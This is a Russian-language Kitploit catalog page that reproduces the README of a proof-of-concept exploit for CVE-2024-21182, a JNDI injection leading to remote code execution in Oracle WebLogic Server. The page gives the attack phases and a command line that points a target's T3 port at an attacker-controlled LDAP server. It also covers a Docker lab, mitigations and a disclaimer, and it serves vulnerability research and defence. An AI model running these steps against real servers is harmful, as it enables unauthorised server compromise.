Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-21182---Oracle-WebLogic-Server-JNDI-Injection-RCE — Эксплойт (proof-of-concept) для CVE-2024-21182 — неаутентифицированная JNDI-инъекция, приводящая к удаленному выполнению кода на Oracle WebLogic Server через протоколы T3/IIOP. Включает Docker-лабораторию для тестирования. | Kitploit
Инструменты/GitHubGitHub/fevar54/cve-2024-21182---oracle-weblogic-server-jndi-injection-rce
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной НагрузкиЛаборатории и Практика
GitHubfevar54/cve-2024-21182---oracle-weblogic-server-jndi-injection-rce

CVE-2024-21182---Oracle-WebLogic-Server-JNDI-Injection-RCE

Эксплойт (proof-of-concept) для CVE-2024-21182 — неаутентифицированная JNDI-инъекция, приводящая к удаленному выполнению кода на Oracle WebLogic Server через протоколы T3/IIOP. Включает Docker-лабораторию для тестирования.

Репозиторий
23 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-21182 - Инъекция JNDI в Oracle WebLogic Server → RCE

CVE-2024-21182 - Инъекция JNDI в Oracle WebLogic Server → RCE

CVE-2024-21182 CVSS CISA KEV

📋 Описание

CVE-2024-21182 — это неаутентифицированная уязвимость внедрения JNDI, которая затрагивает компонент Core Oracle WebLogic Server. Она позволяет удаленному злоумышленнику через протоколы T3 или IIOP выполнить произвольный код (RCE) на сервере, получив полный доступ ко всем данным сервера[citation:5][citation:8][citation:9].

Этот репозиторий содержит функциональный Proof of Concept (PoC), демонстрирующий успешную эксплуатацию обход патча CVE-2023-21839 с помощью цепочки гаджетов AggregatableOpaqueReference + MessageDestinationReference[citation:2][citation:4].

🚨 Детали уязвимости

АтрибутЗначение
CVECVE-2024-21182
ПродуктOracle WebLogic Server (Core)
Затронутые версии12.2.1.4.0 и 14.1.1.0.0[citation:7]
Доступный патчOracle Critical Patch Update (Июль 2024 и Октябрь 2024)[citation:6]
Статус в CISA KEVАктивная эксплуатация подтверждена (добавлено 01.06.2026)[citation:3][citation:8]
Крайний срок смягчения (CISA)04.06.2026[citation:8]

Вектор атаки

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

  • Сеть (AV:N): Эксплуатируется удаленно
  • Низкая сложность (AC:L): Без особых условий
  • Без аутентификации (PR:N): Анонимный доступ
  • Без взаимодействия с пользователем (UI:N): Пассивная эксплуатация

⚙️ Фазы атаки

Фаза 1: Разведка: Определение серверов WebLogic с открытыми портами T3/IIOP (7001).

Фаза 2: Анализ: Определение, работает ли на сервере уязвимая версия (12.2.1.4.0 или 14.1.1.0.0) или отсутствует патч от октября 2024.

Фаза 3: Эксплуатация (технический процесс):

  1. Создание гаджета: Злоумышленник создает объект AggregatableOpaqueReference[citation:2].
  2. Внедрение ссылки: С помощью рефлексии (Java) модифицируется приватное поле referent предыдущего объекта, чтобы оно указывало на вредоносный MessageDestinationReference[citation:4].
  3. Bind и Lookup: Вредоносный объект "привязывается" (bind) в дереве JNDI сервера, а затем "ищется" (lookup).
  4. Разрешение JNDI: При поиске объекта сервер выполняет новый запрос JNDI к URL, контролируемому злоумышленником (LDAP-сервер).
  5. LDAP-сервер: Отвечает ссылкой на Java-код, размещенный на HTTP-сервере злоумышленника.
  6. Выполнение кода: Сервер WebLogic загружает и инстанциирует Java-класс, выполняя его содержимое в контексте машины жертвы.

🛠️ Предварительные требования

  • Docker и Docker Compose: Для изолированной тестовой среды[citation:2].
  • JDK 8 или выше: Для компиляции и запуска T3-клиента.
  • T3-клиент WebLogic: wlthint3client.jar (можно извлечь из установки WebLogic).

🚀 Использование PoC

Лабораторная среда (Docker)

root@kitploit:~
# 1. Клонировать репозиторий
git clone https://github.com/твой-пользователь/CVE-2024-21182.git
cd CVE-2024-21182

# 2. Запустить лабораторию (жертва + атакующий)
docker-compose up -d

# 3. Выполнить автоматическую эксплуатацию
./validate.sh

Эксплуатация против реальной цели (при наличии разрешения)

root@kitploit:~
# 1. Запустить вредоносный LDAP/HTTP сервер
python3 exploit/ldap_server.py

# 2. В другом терминале выполнить Java-пейлоад
javac -cp ".:wlthint3client.jar" poc/CVE_2024_21182.java
java -cp ".:wlthint3client.jar" CVE_2024_21182 t3://<TARGET_IP>:7001 ldap://<ATTACKER_IP>:1389/Evil

📊 Продемонстрированное воздействие

  • Удаленное выполнение команд (RCE) на сервере
  • Несанкционированный доступ к критическим данным приложения
  • Полная компрометация сервера приложений
  • Потенциальная точка входа для бокового перемещения в корпоративной сети
  • Основа для развертывания программ-вымогателей или других вредоносных нагрузок

Текущий статус по CISA: "Known To Be Used in Ransomware Campaigns? Unknown" (Но обычно да, RCE в промежуточном ПО являются начальным вектором в атаках с использованием программ-вымогателей).

🛡️ Смягчение

  • Немедленно установить патч: Применить Critical Patch Update от Oracle за октябрь 2024 года или более поздний.
  • Ограничение сети: Блокировать/ограничить доступ к портам T3/IIOP (например, 7001) только из доверенных источников.
  • Мониторинг: Обнаруживать необычные попытки bind/lookup в дереве JNDI.

⚠️ Правовое уведомление

Этот код предназначен исключительно для образовательных и исследовательских целей. Неправомерное использование данного PoC против систем без явного разрешения незаконно. Автор не несет ответственности за неправомерное использование этой информации.

📚 Ссылки

  • NVD - CVE-2024-21182
  • CISA KEV Catalog
  • Oracle Security Advisory
  • Оригинальный технический анализ

🤝 Благодарности

  • Исходный исследователь, обнаруживший цепочку гаджетов
  • dinosn за воспроизводимую лабораторную среду в Docker
Скачать инструмент